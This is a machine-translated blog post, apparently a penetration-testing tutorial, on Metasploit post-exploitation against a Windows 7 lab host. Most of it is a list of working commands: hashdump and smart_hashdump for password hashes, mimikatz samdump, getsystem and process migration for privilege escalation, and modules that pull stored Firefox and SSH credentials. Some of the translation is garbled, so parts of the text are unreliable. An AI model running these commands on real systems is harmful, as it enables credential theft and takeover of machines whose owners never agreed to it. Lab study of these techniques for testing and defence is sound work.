当前位置:网站首页>Intranet information collection of Intranet penetration (3)
Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Ordinary users are entitled to
Intranet information collection of Intranet penetration ( Four )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump //system The powers of the meterpreter
set session 1
exploit // The results are stored in tmp Under the table of contents
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
User name :RID:LM-HASH value :NT-HASH value
rid yes windows The system account corresponds to a fixed value , Be similar to linux Of uid,gid Number ,500 by administartor,501 by guest etc. . and lm-hash and nt-hash, They all encrypt user passwords , But the encryption method is different
hashdump It uses mimikatz Part of the function of
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Ordinary users are entitled to
getuid
View user permissions
hashdump
Need administrator's permission
getsystem
It's just that on the surface, it has obtained administrator permission , Do not have some real administrator privileges
ps
Check the process
getpid
View the current process
migrate
Process migration ( Migrate ordinary user processes to administrator user processes )
hashdump
08other
Determine whether the target host is a virtual machine :
run checkvm
Get the software installation information on the target host :
run post/windows/gather/enum_applications
Get the most recently accessed documents on the target host 、 Link information :
run post/windows/gather/dumplinks
View the target environment information :
run post/windows/gather/env
see firefox Account and password stored in :
run post/windows/gather/firefox_creds
see ssh Ciphertext information of account password 、 Certificate information :
run post/windows/gather/ssh_creds
边栏推荐
- Middleware vulnerability recurrence Apache
- msf生成payload大全
- HackMyvm靶机系列(7)-Tron
- Chain team implementation (C language)
- 攻防世界MISC练习区(SimpleRAR、base64stego、功夫再高也怕菜刀)
- How to test whether an object is a proxy- How to test if an object is a Proxy?
- HackMyvm靶機系列(3)-visions
- 《统计学》第八版贾俊平第十三章时间序列分析和预测知识点总结及课后习题答案
- 内网渗透之内网信息收集(一)
- 内网渗透之内网信息收集(三)
猜你喜欢
链队实现(C语言)
网络层—简单的arp断网
Windows platform mongodb database installation
Captcha killer verification code identification plug-in
Database monitoring SQL execution
Hackmyvm Target Series (3) - vues
DVWA (5th week)
Experiment 6 inheritance and polymorphism
《统计学》第八版贾俊平第六章统计量及抽样分布知识点总结及课后习题答案
. Net6: develop modern 3D industrial software based on WPF (2)
随机推荐
Network layer - simple ARP disconnection
Ucos-iii learning records (11) - task management
内网渗透之内网信息收集(三)
Realize applet payment function with applet cloud development (including source code)
7-4 hash table search (PTA program design)
Intranet information collection of Intranet penetration (2)
Experiment 8 exception handling
《统计学》第八版贾俊平第十三章时间序列分析和预测知识点总结及课后习题答案
How to earn the first pot of gold in CSDN (we are all creators)
Statistics 8th Edition Jia Junping Chapter 14 summary of index knowledge points and answers to exercises after class
内网渗透之内网信息收集(二)
7-5 staircase upgrade (PTA program design)
HackMyvm靶机系列(5)-warez
Xray and burp linkage mining
WEB漏洞-文件操作之文件包含漏洞
[three paradigms of database] you can understand it at a glance
Lintcode logo queries the two nearest saplings
Internet Management (Information Collection)
Hackmyvm target series (2) -warrior
Constants, variables, and operators of SystemVerilog usage